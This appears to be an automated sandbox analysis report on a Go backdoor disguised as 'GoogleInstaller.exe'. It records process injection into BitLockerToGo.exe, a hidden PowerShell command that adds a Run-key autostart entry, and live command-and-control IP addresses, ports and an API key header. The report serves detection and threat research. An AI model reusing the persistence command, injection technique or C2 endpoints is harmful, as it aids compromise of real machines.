
Windows Analysis Report
GoogleInstaller.exe

Overview

General Information

Sample name: GoogleInstaller.exe
Analysis ID: 1524043
MD5: 3d429d9f74da7b1f95ea8db8a486ed20
SHA1: 6e7d73e9fb4b67f0587cd7d6dbbabe72be42fa2e
SHA256: e1224cbff7ca30da4bbfeab556bf76f73576d76ae3cf42f49e778ca16ced6f15
Tags: afscvfa-comexe, user-JAMESWT_MHT

Detection

GO Backdoor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Allocates memory in foreign processes
Creates an autostart registry key pointing to binary in C:\Windows
Found Tor onion address
Injects a PE file into a foreign processes
Suspicious powershell command line found
Writes to foreign memory regions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • GoogleInstaller.exe (PID: 4188 cmdline: "C:\Users\user\Desktop\GoogleInstaller.exe" MD5: 3D429D9F74DA7B1F95EA8DB8A486ED20)
    • BitLockerToGo.exe (PID: 6512 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 1216 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • BitLockerToGo.exe (PID: 2760 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
Process Memory Space: BitLockerToGo.exe PID: 6512 | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security |

    System Summary

    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6512, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", ProcessId: 1216, ProcessName: powershell.exe
    Timestamp                        | SID     | Severity | Classtype                     | Source IP   | Source Port | Destination IP | Destination Port | Protocol
    2024-10-02T15:14:10.993489+0200  | 2855536 | 1        | A Network Trojan was detected | 192.168.2.6 | 54994       | 94.103.90.9    | 22993            | TCP
    2024-10-02T15:14:40.440237+0200  | 2855537 | 1        | A Network Trojan was detected | 192.168.2.6 | 54994       | 94.103.90.9    | 22993            | TCP
    2024-10-02T15:14:40.662521+0200  | 2855538 | 1        | A Network Trojan was detected | 94.103.90.9 | 22993       | 192.168.2.6    | 54994            | TCP
    2024-10-02T15:14:10.993284+0200  | 2855539 | 1        | A Network Trojan was detected | 94.103.90.9 | 22993       | 192.168.2.6    | 54994            | TCP


    AV Detection

    Source: GoogleInstaller.exe | ReversingLabs: Detection: 13%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.5% probability
    Source: GoogleInstaller.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: GoogleInstaller.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp

    Networking

    Source: Network traffic | Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.90.9:22993 -> 192.168.2.6:54994
    Source: Network traffic | Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.6:54994 -> 94.103.90.9:22993
    Source: Network traffic | Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.6:54994 -> 94.103.90.9:22993
    Source: Network traffic | Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.90.9:22993 -> 192.168.2.6:54994
    Source: global traffic | TCP traffic: 192.168.2.6:54994 -> 94.103.90.9:22993
    Source: Joe Sandbox View | IP Address: 94.103.90.9 94.103.90.9
    Source: Joe Sandbox View | ASN Name: VDSINA-ASRU VDSINA-ASRU
    Source: unknown | DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
    Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknown | TCP traffic detected without corresponding DNS query: 94.103.90.9
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Host: 46.8.232.106 User-Agent: Go-http-client/1.1 Content-Length: 162 X-Api-Key: tbNgF6Ul Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 33 0b 17 54 0c 11 2d 2c 2f 54 3b 08 02 1a 1a 31 5c 00 31 5f 58 3f 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 1b 2a 03 11 51 03 17 2e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 16 1d 54 0a 17 58 28 3f 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 04 59 01 48 50 25 01 5c 24 0a 59 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a Data Ascii: M*L\K3T-,/T;1\1_X?!EOM:DSE*Q.LJK9AULTX(?EOM9L\KWYHP%\$YEOM\EYMP]SSV^X[RYQZYR^K
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.232.106
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://46.8.236.61
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91User-Agent:
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://91.212.166.91http://46.8.232.106
    Source: BitLockerToGo.exe, 00000002.00000002.4017005702.000000000BCB8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://93.185.159.253
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.2487699090.0000000007A24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000006.00000002.2473404910.0000000005451000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000002.2473404910.00000000055A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: GoogleInstaller.exe | String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
    Source: powershell.exe, 00000006.00000002.2484844478.00000000064BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: GoogleInstaller.exe | String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictduration

    System Summary

    Source: 00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: 00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
    Source: GoogleInstaller.exe, 00000000.00000000.2167196727.0000000001F01000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameGoogle Installer.exeD" vs GoogleInstaller.exe
    Source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs GoogleInstaller.exe
    Source: GoogleInstaller.exe | Binary or memory string: OriginalFilenameGoogle Installer.exeD" vs GoogleInstaller.exe
    Source: GoogleInstaller.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.2377337169.0000000003D7E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000000.00000002.2377337169.0000000006348000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: 00000000.00000002.2377337169.0000000005364000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@1/3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File created: C:\Users\user\AppData\Local\config
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxwq2z0d.deo.ps1
    Source: GoogleInstaller.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: GoogleInstaller.exe | ReversingLabs: Detection: 13%
    Source: GoogleInstaller.exe | String found in binary or memory: net/addrselect.go
    Source: GoogleInstaller.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | File read: C:\Users\user\Desktop\GoogleInstaller.exe
    Source: unknown | Process created: C:\Users\user\Desktop\GoogleInstaller.exe "C:\Users\user\Desktop\GoogleInstaller.exe"
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Section loaded: pdh.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winmm.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: powrprof.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: umpdc.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: textshaping.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: textinputframework.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: coreuicomponents.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: GoogleInstaller.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: GoogleInstaller.exe | Static file information: File size 17015808 > 1048576
    Source: GoogleInstaller.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3e9600
    Source: GoogleInstaller.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xbb0000
    Source: GoogleInstaller.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: GoogleInstaller.exe, 00000000.00000002.2374528063.0000000002CB8000.00000004.00001000.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: GoogleInstaller.exe | Static PE information: section name: .symtab
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_04E46D4C pushad ; iretd 6_2_04E46D4D

    Boot Survival

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2275
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 669
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1016 | Thread sleep count: 2275 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4540 | Thread sleep count: 669 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460 | Thread sleep time: -922337203685477s >= -30000s
    Source: BitLockerToGo.exe, 00000002.00000002.4016440694.00000000033F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: GoogleInstaller.exe, 00000000.00000002.2372452613.000000000242C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A80000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A80000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 675008
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A80000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2A81000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F6B000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3217000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 327A000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 327B000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 32A9000
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Queries volume information: C:\Users\user\Desktop\GoogleInstaller.exe VolumeInformation
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Queries volume information: C:\Windows VolumeInformation
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
    Source: C:\Users\user\Desktop\GoogleInstaller.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
